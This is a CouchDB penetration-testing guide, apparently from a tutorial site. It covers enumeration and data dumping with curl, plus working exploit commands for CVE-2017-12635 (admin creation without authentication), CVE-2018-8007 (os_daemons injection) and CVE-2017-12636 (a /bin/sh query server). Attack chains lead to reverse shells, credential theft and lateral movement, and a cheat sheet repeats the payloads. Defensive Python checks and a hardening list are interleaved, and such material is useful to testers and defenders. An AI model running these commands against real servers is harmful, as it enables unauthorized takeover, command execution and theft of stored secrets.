# CouchDB - Port 5984,6984

{% tabs %}
{% tab title="Support VeryLazyTech 🎉" %}

* Become VeryLazyTech [**member**](https://whop.com/verylazytech/)**! 🎁**
* **Follow** us on:
  * **✖ Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.**
  * **👾 Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.**
  * **📜 Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.**
  * **📺 YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.**
  * **📩 Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.**
  * **🕵️‍♂️ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.**
* Visit our [**shop**](https://whop.com/verylazytech/) for e-books and courses.  📚
{% endtab %}
{% endtabs %}

### Basic info

CouchDB is **a document-oriented, schema-less NoSQL database where every “document” is just JSON.**

Internally, CouchDB stores:

| Field  | Meaning                          |
| ------ | -------------------------------- |
| `_id`  | The document’s unique identifier |
| `_rev` | Revision number (tracks changes) |

Documents can contain key-value mappings, nested maps, or lists.\
Everything is accessed through **HTTP REST APIs** — not drivers.

#### Default Ports

| Port     | Protocol | Purpose                                                        |
| -------- | -------- | -------------------------------------------------------------- |
| **5984** | HTTP     | Public API                                                     |
| **6984** | HTTPS    | Public API                                                     |
| **5986** | Internal | Node-local API                                                 |
| **4369** | TCP      | Erlang Port Mapper Daemon (EPMD) — extremely important for RCE |

And if you see **port 4369 (EPMD)** → your hacker senses should start tingling. (More on that later.)

***

## **Automatic Enumeration**

#### Nmap

```bash
nmap -sV --script couchdb-databases,couchdb-stats -p 5984 <IP>
```

#### Metasploit

```bash
msf> use auxiliary/scanner/couchdb/couchdb_enum
```

***

## **Manual Enumeration (Must-Know for Real Pentesters)**

#### Check if CouchDB is reachable

```bash
curl http://<IP>:5984/
```

Possible outputs:

**Unauthenticated access allowed:**

```json
{"couchdb":"Welcome","version":"2.0.0","vendor":{"name":"The Apache Software Foundation"}}
```

**Authentication required:**

```json
{"error":"unauthorized","reason":"Authentication required."}
```

If you see **401**, you’ll need creds or an exploit.
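As an added example (not code from the original page), a small Python triage helper that classifies the two responses above and checks the advertised version against the ranges this page later lists as needing an upgrade (1.x and 2.x before 2.2). It also pulls the system databases out of an `/_all_dbs` listing, since `_users` and `_replicator` are the ones that hold credentials and should never be listable without authentication. The sample bodies are constructed from the outputs shown; `classify_root_response`, `parse_version` and `exposed_system_dbs` are names chosen here.

```python
import json
import re

# Constructed sample bodies, modelled on the outputs shown above.
OPEN_BANNER = ('{"couchdb":"Welcome","version":"2.0.0",'
               '"vendor":{"name":"The Apache Software Foundation"}}')
AUTH_BANNER = '{"error":"unauthorized","reason":"Authentication required."}'
SAMPLE_ALL_DBS = '["_global_changes","_metadata","_replicator","_users","passwords","simpsons"]'


def parse_version(version):
    """Turn a version string such as "2.0.0" into a (major, minor, patch) tuple."""
    nums = [int(p) for p in re.findall(r"\d+", version)[:3]]
    while len(nums) < 3:
        nums.append(0)
    return tuple(nums)


def classify_root_response(body):
    """Classify the JSON body returned by GET / on port 5984.

    access       -> "open" when the welcome banner came back without credentials,
                    "auth_required" when the server answered with the unauthorized error
    version      -> the advertised version string, if any
    version_risk -> True when the version is 1.x or 2.x before 2.2 (the ranges this
                    page lists as needing an upgrade), False otherwise, None if unknown
    """
    data = json.loads(body)
    if data.get("error") == "unauthorized":
        return {"access": "auth_required", "version": None, "version_risk": None}
    version = data.get("version")
    risk = None
    if version:
        major, minor, _ = parse_version(version)
        risk = major == 1 or (major == 2 and minor < 2)
    return {"access": "open", "version": version, "version_risk": risk}


def exposed_system_dbs(all_dbs_body):
    """Return the system databases (names starting with '_') visible in an
    /_all_dbs listing; seeing these without credentials means _users and
    _replicator contents are reachable by anyone who can hit the port."""
    names = json.loads(all_dbs_body)
    return sorted(n for n in names if n.startswith("_"))


if __name__ == "__main__":
    print(classify_root_response(OPEN_BANNER))
    print(classify_root_response(AUTH_BANNER))
    print(exposed_system_dbs(SAMPLE_ALL_DBS))
```

Feed it the raw body of the `curl` calls above; an `open` result with `version_risk` set is the combination that deserves immediate attention from whoever owns the host.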

***

## **High-Value Endpoints Hackers Should Always Check**

These endpoints typically reveal **database names**, **cluster metadata**, and **replication details** — sometimes containing **API keys**, **JWT secrets**, **production credentials**, or **remote cluster URLs**.

| Endpoint               | What It Reveals                              |
| ---------------------- | -------------------------------------------- |
| `/_active_tasks`       | Replication, indexing jobs, DB names         |
| `/_all_dbs`            | **All database names** (usually the jackpot) |
| `/_cluster_setup`      | Cluster configuration                        |
| `/_db_updates`         | Real-time database creation events           |
| `/_membership`         | Cluster nodes                                |
| `/_scheduler/jobs`     | Replication jobs and their source/target URLs, which can embed credentials |
| `/_node/_local/_stats` | System info                                  |
| `/_up`                 | Basic health check                           |
| `/_uuids`              | UUID generation                              |
| `/_reshard`            | Shard operations                             |

Use:

```bash
curl http://<IP>:5984/_all_dbs
```

If 401:

```bash
curl http://user:pass@<IP>:5984/_all_dbs
```

***

## **Extracting Databases, Documents & Credentials**

#### List databases

```bash
curl http://<IP>:5984/_all_dbs
```

Example:

```json
["_global_changes","_metadata","_replicator","_users","passwords","simpsons"]
```

#### Show DB metadata

```bash
curl http://<IP>:5984/<dbname>
```

#### List documents

```bash
curl http://<IP>:5984/<dbname>/_all_docs
```

#### Read a document

```bash
curl http://<IP>:5984/<dbname>/<doc_id>
```

At this point, in real pentests, you often find:

✔ API keys\
✔ Auth tokens\
✔ Password databases\
✔ Backups\
✔ Internal cluster secrets\
✔ User PII

***

## **Exploitation Techniques**

CouchDB has had **multiple high-impact CVEs**, many still found in the wild.

#### **CVE-2017-12635 — Create an Admin User Without Authentication**

This is the **most famous and most dangerous CouchDB vulnerability ever discovered**.

#### 🧠 Why it works

CouchDB parses JSON twice — once in **Erlang**, once in **JavaScript**.

If you send **two fields with the same key**, the Erlang parser keeps the first occurrence, but the JS parser keeps only the last.

Meaning this payload:

```json
{
  "type":"user",
  "name":"hacktricks",
  "roles":["_admin"],
  "roles":[],
  "password":"hacktricks"
}
```

→ **Erlang sees roles=\["\_admin"]**\
→ **JS sees roles=\[]**

CouchDB incorrectly grants admin privileges.

#### Exploit:

```bash
curl -X PUT -d '{"type":"user","name":"hacktricks","roles":["_admin"],"roles":[],"password":"hacktricks"}' \
     http://<IP>:5984/_users/org.couchdb.user:hacktricks \
     -H "Content-Type:application/json"
```

You now have **admin control of the entire server**.
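To make the parser discrepancy concrete, here is an added Python model (not code from the page or from CouchDB) of the two behaviours described above, plus the check a validation layer or reverse proxy would use to refuse documents whose meaning depends on which parser reads them. The payload string is constructed to match the one above; the function names are chosen here.

```python
import json

# Constructed payload with the same shape as the one in the section above:
# "roles" appears twice, first as ["_admin"], then as [].
PAYLOAD = ('{"type":"user","name":"hacktricks","roles":["_admin"],'
           '"roles":[],"password":"hacktricks"}')


def parse_first_wins(text):
    """Model the Erlang-side behaviour: the first occurrence of a key wins."""
    def hook(pairs):
        out = {}
        for key, value in pairs:
            out.setdefault(key, value)   # later duplicates are ignored
        return out
    return json.loads(text, object_pairs_hook=hook)


def parse_last_wins(text):
    """Model the JS-side behaviour (also Python's default): the last occurrence wins."""
    return json.loads(text)


def find_duplicate_keys(text):
    """Return the set of keys that occur more than once inside any single object
    of the document (nested objects are checked too, each on its own)."""
    dupes = set()

    def hook(pairs):
        seen = set()
        for key, _ in pairs:
            if key in seen:
                dupes.add(key)
            seen.add(key)
        return dict(pairs)

    json.loads(text, object_pairs_hook=hook)
    return dupes


def reject_if_ambiguous(text):
    """Validation-layer check: a document that two conforming parsers would read
    differently is rejected outright instead of being forwarded to the database."""
    dupes = find_duplicate_keys(text)
    if dupes:
        raise ValueError("duplicate keys: " + ", ".join(sorted(dupes)))
    return json.loads(text)


if __name__ == "__main__":
    print("first-wins roles:", parse_first_wins(PAYLOAD)["roles"])   # ['_admin']
    print("last-wins roles: ", parse_last_wins(PAYLOAD)["roles"])    # []
    print("duplicates:      ", find_duplicate_keys(PAYLOAD))         # {'roles'}
```

The same check belongs in any service that validates JSON in one component and acts on it in another: agreement between the two parsers is an assumption, not a guarantee, and rejecting duplicate keys removes the whole class of mismatch.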

***

#### **CVE-2018-8007 — RCE via local.ini write injection (OS Daemons)**

If an attacker can write to `local.ini` (misconfigured perms), they can register system daemons to be executed by CouchDB.

Injection example:

```bash
curl -X PUT 'http://admin:admin@localhost:5984/_node/couchdb@localhost/_config/cors/origins' \
     -d "evil\n\n[os_daemons]\npwn=/usr/bin/touch /tmp/pwned"
```

Then:

```bash
kill <couchdb PID>
```

CouchDB restarts → executes `/usr/bin/touch /tmp/pwned`.

This is **full OS command execution**.
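As an added illustration (not code from the page or from CouchDB), the following Python reproduces the ini breakout mechanism with the standard `configparser` and shows the value check that closes it: a configuration value must never contain a line break, because a line break lets the value end its own line and open a new section. The injected string is constructed to match the one in the request above; `render_ini`, `parse_ini`, `is_safe_config_value` and `store_config_value` are names chosen here.

```python
import configparser

# Constructed value, shaped like the injected string in the request above.
INJECTED_VALUE = "evil\n\n[os_daemons]\npwn=/usr/bin/touch /tmp/pwned"


def render_ini(section, key, value):
    """Write one key into an ini fragment the way a config writer that does
    not sanitise the value would: the value is pasted in verbatim."""
    return "[%s]\n%s = %s\n" % (section, key, value)


def parse_ini(text):
    """Parse ini text into {section: {key: value}} with the standard library."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(text)
    return {section: dict(cp.items(section)) for section in cp.sections()}


def is_safe_config_value(value):
    """A value carrying CR or LF can terminate its own line and start a new
    section or key, so it is rejected before it reaches the config writer."""
    return "\r" not in value and "\n" not in value


def store_config_value(config_text, section, key, value):
    """Hardened writer: refuse unsafe values, otherwise append the fragment."""
    if not is_safe_config_value(value):
        raise ValueError("config value must not contain line breaks")
    return config_text + render_ini(section, key, value)


if __name__ == "__main__":
    # Naive writer: one CORS origin value turns into a whole [os_daemons] section
    # once the file is read back.
    print(parse_ini(render_ini("cors", "origins", INJECTED_VALUE)))
    # Hardened writer: the same value is rejected.
    try:
        store_config_value("", "cors", "origins", INJECTED_VALUE)
    except ValueError as exc:
        print("rejected:", exc)
```

Run with no arguments it prints the parsed sections from the naive writer (note the extra `os_daemons` section) followed by the rejection from the hardened one. The lesson generalises to any text-based configuration format: values are data, and data that can contain the format's own structural characters must be validated or escaped before it is written.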

#### **CVE-2017-12636 — RCE via malicious query server definitions**

CouchDB allows admins to define query servers, e.g.:

```ini
[query_servers]
python=/usr/bin/python3
```

But if you can write:

```ini
cmd=/bin/sh
```

You can trigger it by creating a view that calls the query server.

Example exploitation flow:

```bash
curl -X PUT http://admin:pass@host:5984/evil
curl -X PUT http://admin:pass@host:5984/evil/payload -d '{"_id":"x"}'
curl -X PUT http://admin:pass@host:5984/evil/_design/pwn \
     -d '{"views":{"x":{"map":""}},"language":"cmd"}'
```

Boom → command execution.

#### **Erlang Cookie RCE (Not a CVE — but extremely real)**

If port **4369 (EPMD)** is open AND you can read the Erlang cookie file (usually `.erlang.cookie`), you can:

✔ Join the CouchDB cluster\
✔ Execute arbitrary Erlang code\
✔ Spawn remote shells\
✔ Dump secrets\
✔ Control the entire node

This is a **full cluster compromise**.

Erlang cookies are commonly found in:

```
/home/couchdb/.erlang.cookie
/home/<user>/.erlang.cookie
```

If readable → game over.

***

## **Practical Real-World Attack Chains**

### Attack Chain 1:

#### **Unauthenticated CouchDB + Exposed \_all\_dbs → Secrets → Lateral Movement**

1. Access `/_all_dbs`
2. Dump `_replicator` DB
3. Replication tasks often include remote credentials
4. Use creds to pivot into AWS, GitLab, MongoDB, etc.

***

### Attack Chain 2:

#### **CVE-2017-12635 Admin Creation → Query Server RCE → Reverse Shell**

1. Create admin user (CVE-2017-12635)
2. Add malicious query server
3. Trigger RCE via design document
4. Send reverse shell payload
5. Full system compromise

***

### Attack Chain 3:

#### **Misconfigured local.ini → CouchDB Daemon Injection (CVE-2018-8007) → Privilege escalation**

1. Write to `/home/*/etc/local.ini`
2. Inject `[os_daemons]`
3. Restart CouchDB → execute payload
4. Gain local user’s privileges
5. Escalate via sudo misconfig or cron jobs

***

### Attack Chain 4:

#### **Erlang Cookie Leakage → Cluster Takeover**

1. Access `.erlang.cookie` (world-readable)
2. Connect to EPMD node
3. Execute arbitrary Erlang commands
4. RCE without touching CouchDB API
5. Persist via erlang shell

This is extremely powerful and still commonly found.

***

## **Defending CouchDB (What Blue Teams Must Fix)**

✔ Disable remote access to 5984 unless behind firewall\
✔ Block port 4369 (EPMD) externally\
✔ Do NOT allow world-writable `local.ini`\
✔ Upgrade from vulnerable versions:

* 1.x
* 2.x pre-2.2

✔ Enforce authentication (`require_valid_user = true`)\
✔ Disable `_session` cookie if not needed\
✔ Disable CORS unless required\
✔ Rotate Erlang cookie after compromise\
✔ Disable default admin/admin accounts
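The checklist above maps naturally onto a configuration audit. As an added example (not the project's code and not from the original page), the Python below reads a `local.ini` body with the standard `configparser` and flags the weak settings the list names, and a second helper checks file modes for the world-writable `local.ini` and readable `.erlang.cookie` cases from the sections above. The two sample files are constructed; the section and key names (`[chttpd] require_valid_user`, `[chttpd] bind_address`, `[admins]`, `[httpd] enable_cors`, `[query_servers]`, `[os_daemons]`) follow CouchDB 2.x conventions and are assumptions to confirm against the installed version; the admin hash in the hardened file is a placeholder.

```python
import configparser
import stat

# Constructed local.ini with several of the weak settings the list above warns about.
WEAK_LOCAL_INI = """\
[chttpd]
require_valid_user = false
bind_address = 0.0.0.0

[admins]
admin = admin

[httpd]
enable_cors = true

[query_servers]
cmd = /bin/sh

[os_daemons]
evil = /bin/sh /tmp/malicious.sh
"""

# Constructed hardened counterpart. The admin value is a placeholder: CouchDB
# replaces a plaintext admin password with a "-pbkdf2-..." hash on startup.
HARDENED_LOCAL_INI = """\
[chttpd]
require_valid_user = true
bind_address = 127.0.0.1

[admins]
admin = -pbkdf2-<hash placeholder>

[httpd]
enable_cors = false
"""

SHELLS = {"sh", "bash", "dash", "zsh"}


def audit_local_ini(text):
    """Return a list of findings for a local.ini body (empty list means clean).
    Section/key names follow CouchDB 2.x conventions (an assumption here)."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(text)
    findings = []
    if cp.get("chttpd", "require_valid_user", fallback="false").lower() != "true":
        findings.append("require_valid_user is not enforced")
    if cp.get("chttpd", "bind_address", fallback="127.0.0.1") == "0.0.0.0":
        findings.append("API bound to all interfaces; firewall 5984 or bind locally")
    if cp.has_section("admins"):
        for name, secret in cp.items("admins"):
            if name == "admin" and secret == "admin":
                findings.append("default admin/admin account present")
            elif not secret.startswith("-pbkdf2-"):
                findings.append("admin '%s' has a plaintext password in local.ini" % name)
    if cp.get("httpd", "enable_cors", fallback="false").lower() == "true":
        findings.append("CORS enabled; disable unless required")
    if cp.has_section("os_daemons") and cp.items("os_daemons"):
        names = ", ".join(k for k, _ in cp.items("os_daemons"))
        findings.append("[os_daemons] entries present: " + names)
    if cp.has_section("query_servers"):
        for lang, path in cp.items("query_servers"):
            # Flag query servers whose executable is a plain shell.
            if path.split()[0].rsplit("/", 1)[-1] in SHELLS:
                findings.append("query server '%s' is a shell: %s" % (lang, path))
    return findings


def permission_findings(path, mode):
    """Flag a world-writable local.ini or an Erlang cookie accessible to anyone
    but its owner, given the file's st_mode (e.g. os.stat(path).st_mode)."""
    out = []
    if path.endswith("local.ini") and mode & stat.S_IWOTH:
        out.append("%s is world-writable" % path)
    if path.endswith(".erlang.cookie") and mode & (stat.S_IRWXG | stat.S_IRWXO):
        out.append("%s is accessible to group/others; Erlang expects owner-only (0400)" % path)
    return out


if __name__ == "__main__":
    for finding in audit_local_ini(WEAK_LOCAL_INI):
        print("WEAK:", finding)
    print("hardened findings:", audit_local_ini(HARDENED_LOCAL_INI))
    print(permission_findings("/home/couchdb/.erlang.cookie", 0o644))
```

Point `audit_local_ini` at the contents of the node's `local.ini` and `permission_findings` at `os.stat()` of that file and of `.erlang.cookie`; an empty result from both is the baseline the checklist describes.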

***

## **Cheat Sheet Summary for Pentesters**

#### Enumeration

```bash
curl http://host:5984/
curl http://host:5984/_all_dbs
curl http://host:5984/<db>/_all_docs
curl http://host:5984/<db>/<id>
```

#### CVE-2017-12635 Admin Creation

```bash
curl -X PUT -d '{"type":"user","name":"pwn","roles":["_admin"],"roles":[],"password":"pwn"}' \
     http://host:5984/_users/org.couchdb.user:pwn \
     -H "Content-Type:application/json"
```

#### CVE-2017-12636 / Query Server RCE

```bash
curl -X PUT http://admin:pass@host:5984/_node/couchdb@localhost/_config/query_servers/cmd -d '"/bin/sh"'
```

#### CVE-2018-8007 OS Daemon Injection

```ini
[os_daemons]
evil=/bin/sh /tmp/malicious.sh
```

#### Erlang Cookie RCE

Look for `.erlang.cookie` + port 4369 open.

***

{% hint style="success" %}
Learn & practice [**For the Bug Bounty**](https://whop.com/verylazytech/)

{% endhint %}
